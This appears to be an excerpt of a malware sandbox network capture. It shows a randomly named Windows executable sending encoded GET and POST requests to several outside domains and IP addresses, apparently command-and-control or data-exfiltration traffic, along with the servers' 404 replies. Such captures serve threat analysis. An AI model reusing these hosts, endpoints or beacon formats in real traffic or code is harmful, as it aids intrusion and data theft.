                                                                                      Nov 25, 2024 13:56:41.800571918 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.84972938.181.21.85806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:42.892083883 CET507OUTGET /bi55/?UbRxm=9VfqSJPbhh1HsXnTkF+U6adH/BnqBZbub0jDgAwJrnxzr9B3JVfn3uPZcB9gesjtADmpDWZfolEsGVNmGAi6MiyGQ6YANno90wBnX2TfwVwXOUx5FI/nfHL1eW4WOSittQ==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yhj12.one
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:44.480930090 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.849730195.110.124.133806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:50.475522995 CET785OUTPOST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 56 54 44 4c 72 71 2b 6a 65 50 30 37 6b 58 34 74 66 56 6d 79 39 47 48 6b 6b 2f 79 50 61 4d 6a 47 35 41 34 49 68 46 6c 61 38 44 45 30 5a 45 39 6a 63 38 5a 48 55 43 73 49 5a 79 65 45 4f 56 48 41 64 32 4a 56 42 70 69 6e 65 48 67 53 46 66 69 66 30 42 39 2b 4d 31 6e 61 6e 65 6c 66 34 74 69 43 4f 50 4e 72 67 56 35 58 47 63 46 53 6c 30 58 33 6f 47 31 72 6c 69 38 75 4f 64 6a 43 36 65 50 61 6a 31 73 49 61 38 46 30 68 6c 4b 4d 6c 72 39 55 55 4a 2f 70 52 53 48 4a 56 35 6b 41 73 49 35 38 4a 47 6d 6b 45 72 6d 41 56 68 65 68 75 36 4e 69 36 53 62 63 79 43 77 41 36 4e 72 46 53 7a 66 75 39 67 6f 5a 47 58 30 3d
                                                                                      Data Ascii: UbRxm=VTDLrq+jeP07kX4tfVmy9GHkk/yPaMjG5A4IhFla8DE0ZE9jc8ZHUCsIZyeEOVHAd2JVBpineHgSFfif0B9+M1nanelf4tiCOPNrgV5XGcFSl0X3oG1rli8uOdjC6ePaj1sIa8F0hlKMlr9UUJ/pRSHJV5kAsI58JGmkErmAVhehu6Ni6SbcyCwA6NrFSzfu9goZGX0=
                                                                                      Nov 25, 2024 13:56:51.740436077 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:51 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.849731195.110.124.133806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:53.280829906 CET805OUTPOST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 56 54 44 4c 72 71 2b 6a 65 50 30 37 6e 31 73 74 54 53 79 79 71 57 48 6e 76 66 79 50 51 73 6a 61 35 41 45 49 68 45 67 66 38 57 73 30 5a 67 78 6a 47 35 74 48 56 43 73 49 42 69 65 46 44 31 48 31 64 32 45 71 42 70 75 6e 65 48 30 53 46 66 53 66 30 79 46 39 50 46 6e 55 35 2b 6c 52 32 4e 69 43 4f 50 4e 72 67 56 74 39 47 63 64 53 35 56 6e 33 72 6e 31 6f 37 79 38 74 65 74 6a 43 72 4f 50 57 6a 31 73 2b 61 39 4a 4f 68 6e 43 4d 6c 75 42 55 56 62 58 75 59 53 48 50 4c 4a 6c 35 76 4c 59 57 42 30 69 77 46 62 6d 50 61 58 54 65 69 73 38 49 67 77 54 61 78 43 59 72 36 4f 44 7a 58 45 43 47 6e 44 34 70 59 41 67 47 73 35 71 6c 33 63 50 4f 66 45 58 47 4f 59 43 62 47 51 77 4c
                                                                                      Data Ascii: UbRxm=VTDLrq+jeP07n1stTSyyqWHnvfyPQsja5AEIhEgf8Ws0ZgxjG5tHVCsIBieFD1H1d2EqBpuneH0SFfSf0yF9PFnU5+lR2NiCOPNrgVt9GcdS5Vn3rn1o7y8tetjCrOPWj1s+a9JOhnCMluBUVbXuYSHPLJl5vLYWB0iwFbmPaXTeis8IgwTaxCYr6ODzXECGnD4pYAgGs5ql3cPOfEXGOYCbGQwL
                                                                                      Nov 25, 2024 13:56:54.623528004 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:54 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.849732195.110.124.133806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:55.947637081 CET1822OUTPOST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 56 54 44 4c 72 71 2b 6a 65 50 30 37 6e 31 73 74 54 53 79 79 71 57 48 6e 76 66 79 50 51 73 6a 61 35 41 45 49 68 45 67 66 38 57 30 30 5a 54 35 6a 63 61 46 48 45 79 73 49 4e 43 65 59 44 31 48 53 64 32 73 75 42 70 79 33 65 46 4d 53 46 39 61 66 79 44 46 39 55 31 6e 55 6a 65 6c 51 34 74 69 74 4f 50 64 76 67 56 39 39 47 63 64 53 35 57 50 33 2f 47 31 6f 35 79 38 75 4f 64 6a 65 36 65 50 79 6a 7a 45 41 61 39 64 6b 68 58 69 4d 6c 4f 78 55 57 6f 2f 75 58 53 48 4e 4b 4a 6c 49 76 4c 55 4e 42 30 50 4c 46 59 37 69 61 51 66 65 6e 49 68 65 6c 51 62 6d 71 54 63 50 68 6f 36 4d 58 6a 6d 61 6f 42 30 71 61 41 38 42 37 64 4f 34 33 66 6a 38 55 6a 32 2b 56 74 36 64 4b 58 4e 55 39 7a 6a 42 7a 6e 32 4e 55 51 2f 35 67 77 44 38 78 6c 48 4b 55 63 42 36 66 7a 30 71 7a 67 36 68 74 6a 66 64 42 51 4f 58 58 66 74 62 36 57 62 75 7a 64 66 47 6b 43 41 56 63 76 30 74 62 6d 70 2b 72 50 6e 64 74 4d 52 4f 69 2b 6c 53 4b 33 33 50 31 6a 44 4d 68 72 4e 49 34 51 47 31 50 2f 2b 42 56 4a 74 4c 35 42 4c 6d 43 4c 30 4b 66 4c 46 41 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=VTDLrq+jeP07n1stTSyyqWHnvfyPQsja5AEIhEgf8W00ZT5jcaFHEysINCeYD1HSd2suBpy3eFMSF9afyDF9U1nUjelQ4titOPdvgV99GcdS5WP3/G1o5y8uOdje6ePyjzEAa9dkhXiMlOxUWo/uXSHNKJlIvLUNB0PLFY7iaQfenIhelQbmqTcPho6MXjmaoB0qaA8B7dO43fj8Uj2+Vt6dKXNU9zjBzn2NUQ/5gwD8xlHKUcB6fz0qzg6htjfdBQOXXftb6WbuzdfGkCAVcv0tbmp+rPndtMROi+lSK33P1jDMhrNI4QG1P/+BVJtL5BLmCL0KfLFAteeiHWr76ERoT5dXEAPyEHlIybc6TBW+94uzKdiwhQYw9sLpXXaWqc1f+K3xN4GuiOBmayVEUfO7olLivFyFK17Z9w57EKzgCxMODttF59EYKPnVwak1TifY6gNcNZXXlW+6+xj6q5MscAKNQGpMBsQCLto8isJGGDJkVfqWqljjxdvlNajwWoSxbqDo72YOskaQYKu2JRA/s67gQyF36e9zzhvvqW+/sEuJMwgYPslemhBMtrlAjB1jg8wDJ6DPh6rGjGIT/TjdWD/RtQk2qRD39Pa+dGgDrB2gKbRJmiHCf8jzGnACmnm3pKbwQWH0xnMLXEocACERosAWHZikfkcT/bTpZuwiHIcWN87vSb/ILdi6SKvC0rkAwNjL+bojEAd5BaioOeWZ1V+ZbJDKah7mvZoCImmtZRhBC/GNkfAu9/AFZn9kUfRrj2UfuFLp7ZyHwg9+lvL58mj/rpYhZEYWhauBhcwCypc7/w+m4k1805bwIQ4MPeK8658SP6vcrZAq6wB9KyER+Sk3YH21o+jjEcTK8uF/PbzhXwvj/dYPrYjVl1lMfidCEKsZblWl2R7de5POgFjdStAge6ptaBS51hXl1KKKpMcPqRfY6XQUfnwVDb6lEvciqcYgw0K1MPZElfBmV5gdP96GULfR/dph0cD1IR6cdg [TRUNCATED]
                                                                                      Nov 25, 2024 13:56:57.394995928 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:57 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.849733195.110.124.133806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:58.612987995 CET519OUTGET /te2d/?UbRxm=YRrrocWQCJ4z5Wo4Hyii3lnusY6IScX2szwquVJanj4zZRsRM51rBmkRCj7FWFPYdGZcOIeAVFgSZdyx5BBHZnzVg/hu/fGyJb1Cl3lRDP19pEGPrlJr8lwvIP2DjfyM2w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:59.968991041 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:59 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.849734163.44.185.183806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:06.812588930 CET779OUTPOST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 4f 59 61 68 4b 78 76 4b 59 7a 70 66 69 5a 56 69 6f 47 47 56 61 4f 6e 42 63 66 70 32 56 2f 47 65 70 76 46 72 50 68 69 58 59 51 4b 63 70 72 47 58 6f 42 37 64 36 56 65 47 70 55 78 55 75 55 4f 56 4f 57 72 74 41 70 52 61 2f 56 36 58 52 75 32 70 58 62 57 66 30 4d 4e 32 4c 6c 68 2f 53 39 46 50 77 48 32 74 65 79 6b 47 70 4d 53 36 35 5a 47 4f 70 62 30 45 74 70 76 6b 72 73 32 79 2b 32 43 37 65 47 76 63 6d 56 73 66 5a 63 7a 66 53 35 74 54 63 6a 73 68 33 74 75 49 38 32 33 61 38 6c 71 44 32 72 7a 7a 38 50 61 32 74 70 4d 65 75 5a 34 50 52 36 76 43 39 6e 39 62 75 56 72 79 4f 4a 6f 51 35 4e 34 57 66 6c 59 3d
                                                                                      Data Ascii: UbRxm=OYahKxvKYzpfiZVioGGVaOnBcfp2V/GepvFrPhiXYQKcprGXoB7d6VeGpUxUuUOVOWrtApRa/V6XRu2pXbWf0MN2Llh/S9FPwH2teykGpMS65ZGOpb0Etpvkrs2y+2C7eGvcmVsfZczfS5tTcjsh3tuI823a8lqD2rzz8Pa2tpMeuZ4PR6vC9n9buVryOJoQ5N4WflY=
                                                                                      Nov 25, 2024 13:57:08.291812897 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:08.291855097 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                      Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                                                      Nov 25, 2024 13:57:08.291867971 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                                                      Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                                                      Nov 25, 2024 13:57:08.291924953 CET1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                                                      Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                                                      Nov 25, 2024 13:57:08.291937113 CET1236INData Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                                                      Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                                                      Nov 25, 2024 13:57:08.291960955 CET1079INData Raw: 2e 31 36 31 20 30 2d 31 2e 39 20 30 2d 33 2e 38 35 33 2d 2e 35 38 34 2d 34 2e 34 32 35 2d 2e 34 34 37 2d 2e 32 38 2d 2e 39 37 38 2d 2e 33 39 32 2d 31 2e 35 2d 2e 33 31 36 6c 2e 30 30 32 2d 2e 30 30 32 7a 6d 35 37 2e 33 2e 32 34 31 63 2d 2e 34 38
                                                                                      Data Ascii: .161 0-1.9 0-3.853-.584-4.425-.447-.28-.978-.392-1.5-.316l.002-.002zm57.3.241c-.488-.051-.979.066-1.392.331-.6.557-.614 2.528-.629 4.425 0 .993 0 2.062-.09 3.161-.037 1.055-.147 2.106-.329 3.146-.239 1.881-.479 3.823 0 4.515.514.396 1.153.594
                                                                                      Nov 25, 2024 13:57:08.291974068 CET1236INData Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d
                                                                                      Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
